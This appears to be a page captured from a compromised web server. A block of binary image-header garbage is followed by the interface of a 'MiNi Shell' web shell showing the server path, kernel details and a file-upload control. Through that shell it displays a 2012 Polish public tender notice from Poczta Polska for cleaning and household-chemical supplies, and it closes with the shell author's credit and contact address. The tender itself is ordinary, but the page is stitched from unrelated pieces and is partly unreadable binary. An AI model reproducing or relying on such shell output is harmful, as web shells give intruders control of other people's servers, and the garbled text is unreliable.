JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120606/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120606/190256-N-2012.html

<p class="kh_header"><b>Katowice: Dostawy środków czystości i artykułów chemii gospodarczej</b><br>
<b>Numer ogłoszenia: 190256 - 2012; data zamieszczenia: 06.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> "Poczta Polska Spółka Akcyjna" ul.Rakowiecka 26, 00-940 W-wa, KRS: 0000334972 Sąd Rej. dla m.st. W-wy, kapitał zakł.774 140 000 zł w całości wpłacony.Jednostka prowadząca post. w im. "Poczty Polskiej S.A." Centrum Infrastruktury Oddz. Regionalny , pl. Oddziałów Młodzieży Powstańczej 7, 40-940 Katowice, woj. śląskie, tel. (32) 2538862, faks (32) 2513346.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.poczta-polska.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy środków czystości i artykułów chemii gospodarczej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiot zamówienia - Dostawa środków czystości i artykułów chemii gospodarczej, w podziale na dwie części:
1)	część I zamówienia - dostawa środków czystości i artykułów chemii gospodarczej do Regionalnego Zespołu Magazynów w Zabrzu,
2)	część II zamówienia - dostawa środków czystości i artykułów chemii gospodarczej do OSW Dąb Ustroń - Jaszowiec.
2.	Kod CPV określający przedmiot zamówienia: 39831200-8  Detergenty, 39831210-1 Detergenty do zmywarek, 24910000-6 Kleje, 33711900-6 Mydło, 39812100-8 Pasty do podłóg, 39812000-7 Pasty i kremy, 39813000-4 Pasty i proszki czyszczące, 39831240-0 Preparaty czyszczące, 39811000-0 Preparaty do odświeżania powietrza w pomieszczeniach, 39831000-6 Preparaty piorące, 39831250-3 Roztwory myjące, 39831400-0 Środki do czyszczenia ekranów, 39831300-9 Środki do czyszczenia podłóg, 39831600-2 Środki do czyszczenia toalet, 39831220-4	 Środki odtłuszczające, 39831230-7 Środki rozpuszczające tłuszcze. 
3.	Termin realizacji zamówienia (obowiązywania umowy): 12 miesięcy od daty podpisania umowy.
4.	Specyfikacja rodzajowo-ilościowa artykułów drogeryjnych oraz chemii gospodarczej, objętych przedmiotem zamówienia, zawarta jest w załączniku nr 1.
5.	Dostarczone artykuły winny posiadać okres ważności wskazany przez producenta na opakowaniu i powinny być zdatne do użytku, nie krócej niż 6 miesięcy od daty dostawy.
6.	Realizacja dostaw będzie się odbywać sukcesywnie w terminach wskazanych przez zamawiającego (nie częściej niż jeden raz na trzy miesiące), na podstawie zamówień przekazywanych przez poszczególne jednostki zamawiającego tj.:
1)	Regionalny Zespół Magazynów 41-800 Zabrze, Mielżyńskiego 5,
2)	OSW Dąb 43-453 Ustroń - Jaszowiec, ul. Wczasowa 47 a.
7.	Dostawa konkretnego asortymentu i ilości artykułów następować będzie poprzez każdorazowe zamówienie żądanej ilości, pisemnie (przesyłką pocztową), poprzez faks lub pocztą elektroniczną, po wcześniejszym telefonicznym uzgodnieniu z wykonawcą. W przypadku braku możliwości skontaktowania się z wykonawcą za pomocą faksu lub drogą elektroniczną (np. z powodu wyłączenia lub awarii odpowiedniego urządzenia u wykonawcy), za czas zgłoszenia przyjmować się będzie czas wskazany przez zamawiającego. Zamawiający będzie określał w zapotrzebowaniu ilość i rodzaj artykułów.
8.	Zamawiający nie jest zobowiązany do zamówienia towaru w pełnej ilości, określonej w załączniku nr 1. Zmniejszenie ilości zamawianego towaru nie może przekroczyć 20 % całości zamówienia. Z tego tytułu wykonawca nie będzie mógł wnosić jakichkolwiek roszczeń względem zamawiającego.
9.	W wyjątkowych sytuacjach, np. podyktowanych nagłą potrzebą dodatkowej dostawy artykułów, których wcześniej nie można było przewidzieć, zamawiający zastrzega sobie prawo do złożenia dodatkowego zamówienia.
10.	Zamawiający wymaga, aby dostawy były realizowane do następujących miejsc: 
1)	Regionalnego Zespołu Magazynów w Zabrzu, ul. Mielżyńskiego 5,
2)	Ośrodka Szkoleniowo - Wypoczynkowego Dąb w Ustroniu - Jaszowcu, 
ul. Wczasowa 47a. 
9.	Każda zrealizowana dostawa winna być udokumentowana przez wykonawcę fakturą VAT. W celu potwierdzenia wydania towaru wykonawca zobowiązany będzie do wystawienia dokumentu WZ, który dołącza do każdej dostarczonej partii artykułów drogeryjnych oraz chemii gospodarczej.
10.	Nieprzekraczalny termin realizacji dostawy każdej partii produktów zamawiający ustala na 4 dni robocze, od dnia dostarczenia zamówienia wykonawcy.
11.	Dostawy i wyładunek artykułów odbywać się będą wyłącznie na koszt i ryzyko wykonawcy.
12.	Zamawiający wymaga, aby dostarczany przez wykonawcę towar posiadał wymagane atesty PZH.
13.	Zamawiający nie dopuszcza możliwości zmiany cen jednostkowych towaru w trakcie realizacji przedmiotu umowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.83.12.00-8, 39.83.12.10-1, 24.91.00.00-6, 33.71.19.00-6, 39.81.21.00-8, 39.81.20.00-7, 39.81.30.00-4, 39.83.12.40-0, 39.81.10.00-0, 39.83.10.00-6, 39.83.12.50-3, 39.83.14.00-0, 39.83.13.00-9, 39.83.16.00-2, 39.83.12.20-4, 39.83.12.30-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Złożona oferta winna być zabezpieczona wadium w wysokości 1.000,00 zł (słownie: jeden tysiąc złotych 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie wyznacza szczegółowego warunku w tym zakresie i uzna warunek za spełniony na podstawie złożonego przez wykonawcę oświadczenia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie wyznacza szczegółowego warunku w tym zakresie i uzna warunek za spełniony na podstawie złożonego przez wykonawcę oświadczenia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie wyznacza szczegółowego warunku w tym zakresie i uzna warunek za spełniony na podstawie złożonego przez wykonawcę oświadczenia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie wyznacza szczegółowego warunku w tym zakresie i uzna warunek za spełniony na podstawie złożonego przez wykonawcę oświadczenia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie wyznacza szczegółowego warunku w tym zakresie i uzna warunek za spełniony na podstawie złożonego przez wykonawcę oświadczenia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>oryginał pełnomocnictwa osób podpisujących ofertę, o ile nie wynika to z innych dokumentów załączonych przez wykonawcę do oferty, a w przypadku dołączenia kserokopii pełnomocnictwa musi być ono poświadczone notarialnie</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.poczta-polska.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Poczta Polska Spółka Akcyjna Centrum Infrastruktury Oddział Regionalny w Katowicach, pl. Oddziałów Młodzieży Powstańczej 7, 40-940 Katowice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.06.2012 godzina 10:00, miejsce: Poczta Polska Spółka Akcyjna Centrum Infrastruktury Oddział Regionalny w Katowicach, pl. Oddziałów Młodzieży Powstańczej 7, 40-940 Katowice, pokój 407.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa środków czystości i artykułów chemii gospodarczej do Regionalnego Zespołu Magazynów w Zabrzu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 3.	Termin realizacji zamówienia (obowiązywania umowy): 12 miesięcy od daty podpisania umowy.
4.	Specyfikacja rodzajowo-ilościowa artykułów drogeryjnych oraz chemii gospodarczej, objętych przedmiotem zamówienia, zawarta jest w załączniku nr 1.
5.	Dostarczone artykuły winny posiadać okres ważności wskazany przez producenta na opakowaniu i powinny być zdatne do użytku, nie krócej niż 6 miesięcy od daty dostawy.
6.	Realizacja dostaw będzie się odbywać sukcesywnie w terminach wskazanych przez zamawiającego (nie częściej niż jeden raz na trzy miesiące), na podstawie zamówień przekazywanych przez poszczególne jednostki zamawiającego tj. Regionalny Zespół Magazynów 41-800 Zabrze, Mielżyńskiego 5.
7.	Dostawa konkretnego asortymentu i ilości artykułów następować będzie poprzez każdorazowe zamówienie żądanej ilości, pisemnie (przesyłką pocztową), poprzez faks lub pocztą elektroniczną, po wcześniejszym telefonicznym uzgodnieniu z wykonawcą. W przypadku braku możliwości skontaktowania się z wykonawcą za pomocą faksu lub drogą elektroniczną (np. z powodu wyłączenia lub awarii odpowiedniego urządzenia u wykonawcy), za czas zgłoszenia przyjmować się będzie czas wskazany przez zamawiającego. Zamawiający będzie określał w zapotrzebowaniu ilość i rodzaj artykułów.
8.	Zamawiający nie jest zobowiązany do zamówienia towaru w pełnej ilości, określonej w załączniku nr 1. Zmniejszenie ilości zamawianego towaru nie może przekroczyć 20 % całości zamówienia. Z tego tytułu wykonawca nie będzie mógł wnosić jakichkolwiek roszczeń względem zamawiającego.
9.	W wyjątkowych sytuacjach, np. podyktowanych nagłą potrzebą dodatkowej dostawy artykułów, których wcześniej nie można było przewidzieć, zamawiający zastrzega sobie prawo do złożenia dodatkowego zamówienia.
10.	Zamawiający wymaga, aby dostawy były realizowane do następującego miejsca: Regionalnego Zespołu Magazynów w Zabrzu, ul. Mielżyńskiego 5
9.	Każda zrealizowana dostawa winna być udokumentowana przez wykonawcę fakturą VAT. W celu potwierdzenia wydania towaru wykonawca zobowiązany będzie do wystawienia dokumentu WZ, który dołącza do każdej dostarczonej partii artykułów drogeryjnych oraz chemii gospodarczej.
10.	Nieprzekraczalny termin realizacji dostawy każdej partii produktów zamawiający ustala na 4 dni robocze, od dnia dostarczenia zamówienia wykonawcy.
11.	Dostawy i wyładunek artykułów odbywać się będą wyłącznie na koszt i ryzyko wykonawcy.
12.	Zamawiający wymaga, aby dostarczany przez wykonawcę towar posiadał wymagane atesty PZH.
13.	Zamawiający nie dopuszcza możliwości zmiany cen jednostkowych towaru w trakcie realizacji przedmiotu umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.83.12.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa środków czystości i artykułów chemii gospodarczej do OSW Dąb Ustroń - Jaszowiec.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 3.	Termin realizacji zamówienia (obowiązywania umowy): 12 miesięcy od daty podpisania umowy.
4.	Specyfikacja rodzajowo-ilościowa artykułów drogeryjnych oraz chemii gospodarczej, objętych przedmiotem zamówienia, zawarta jest w załączniku nr 1.
5.	Dostarczone artykuły winny posiadać okres ważności wskazany przez producenta na opakowaniu i powinny być zdatne do użytku, nie krócej niż 6 miesięcy od daty dostawy.
6.	Realizacja dostaw będzie się odbywać sukcesywnie w terminach wskazanych przez zamawiającego (nie częściej niż jeden raz na trzy miesiące), na podstawie zamówień przekazywanych przez poszczególne jednostki zamawiającego tj. OSW Dąb 43-453 Ustroń - Jaszowiec, ul. Wczasowa 47 a.
7.	Dostawa konkretnego asortymentu i ilości artykułów następować będzie poprzez każdorazowe zamówienie żądanej ilości, pisemnie (przesyłką pocztową), poprzez faks lub pocztą elektroniczną, po wcześniejszym telefonicznym uzgodnieniu z wykonawcą. W przypadku braku możliwości skontaktowania się z wykonawcą za pomocą faksu lub drogą elektroniczną (np. z powodu wyłączenia lub awarii odpowiedniego urządzenia u wykonawcy), za czas zgłoszenia przyjmować się będzie czas wskazany przez zamawiającego. Zamawiający będzie określał w zapotrzebowaniu ilość i rodzaj artykułów.
8.	Zamawiający nie jest zobowiązany do zamówienia towaru w pełnej ilości, określonej w załączniku nr 1. Zmniejszenie ilości zamawianego towaru nie może przekroczyć 20 % całości zamówienia. Z tego tytułu wykonawca nie będzie mógł wnosić jakichkolwiek roszczeń względem zamawiającego.
9.	W wyjątkowych sytuacjach, np. podyktowanych nagłą potrzebą dodatkowej dostawy artykułów, których wcześniej nie można było przewidzieć, zamawiający zastrzega sobie prawo do złożenia dodatkowego zamówienia.
10.	Zamawiający wymaga, aby dostawy były realizowane do następujących miejsca Ośrodka Szkoleniowo - Wypoczynkowego Dąb w Ustroniu - Jaszowcu, 
ul. Wczasowa 47a. 
9.	Każda zrealizowana dostawa winna być udokumentowana przez wykonawcę fakturą VAT. W celu potwierdzenia wydania towaru wykonawca zobowiązany będzie do wystawienia dokumentu WZ, który dołącza do każdej dostarczonej partii artykułów drogeryjnych oraz chemii gospodarczej.
10.	Nieprzekraczalny termin realizacji dostawy każdej partii produktów zamawiający ustala na 4 dni robocze, od dnia dostarczenia zamówienia wykonawcy.
11.	Dostawy i wyładunek artykułów odbywać się będą wyłącznie na koszt i ryzyko wykonawcy.
12.	Zamawiający wymaga, aby dostarczany przez wykonawcę towar posiadał wymagane atesty PZH.
13.	Zamawiający nie dopuszcza możliwości zmiany cen jednostkowych towaru w trakcie realizacji przedmiotu umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.83.12.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com